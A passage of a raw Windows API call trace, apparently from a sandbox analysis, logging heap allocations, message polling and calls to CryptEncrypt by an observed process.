dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.681] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00a0 | out: hHeap=0x25c0000) returned 1 [0164.682] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.682] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 13 [0164.683] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptEncrypt", cchWideChar=13, lpMultiByteStr=0x34aa598, cbMultiByte=13, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptEncrypt", lpUsedDefaultChar=0x0) returned 13 [0164.683] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.684] GetProcAddress (hModule=0x74d40000, lpProcName="CryptEncrypt") returned 0x74d6779b [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa268 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0130 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00c0 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0140 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0150 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0160 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0180 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a58 | out: hHeap=0x25c0000) returned 1 [0164.684] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x8bef68*=0x20b1, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x8bef68*=0x20b8) returned 1 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a58 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0180 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa268 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0164.684] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.684] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa460 | out: hHeap=0x25c0000) returned 1 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa460 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.685] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa688 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.685] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa610 | out: hHeap=0x25c0000) returned 1 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0164.686] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0170 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0170 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5b0 | out: hHeap=0x25c0000) returned 1 [0164.686] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00b0 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00d0 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00e0 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a00f0 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0100 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0110 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0120 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6d50 | out: hHeap=0x25c0000) returned 1 [0164.687] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0164.687] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.687] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.687] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.687] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0120 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.688] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0110 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.688] CharLowerBuffW (in: lpsz="byte[8376]", cchLength=0xa | out: lpsz="byte[8376]") returned 0xa [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00a0 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0120 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa328 [0164.688] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a00f0 [0164.689] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466db0 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x24) returned 0x249f1d0 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.689] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa310 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d50 [0164.689] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0060 [0164.690] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0164.690] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.690] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0164.690] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.690] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0080 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0100 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa358 [0164.690] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0080 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0100 [0164.690] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.690] CryptEncrypt (in: hKey=0xaa56a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x24d7a58*, pdwDataLen=0x8bef68*=0x20b1, dwBufLen=0x20b8 | out: pbData=0x24d7a58*, pdwDataLen=0x8bef68*=0x20b8) returned 1 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x2416270 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a01a0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6b8 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5b0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a0190 [0164.691] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0060 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466db0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0110 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0160 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.691] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.691] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a0180 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a00a0 [0164.691] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0164.692] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0164.692] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, 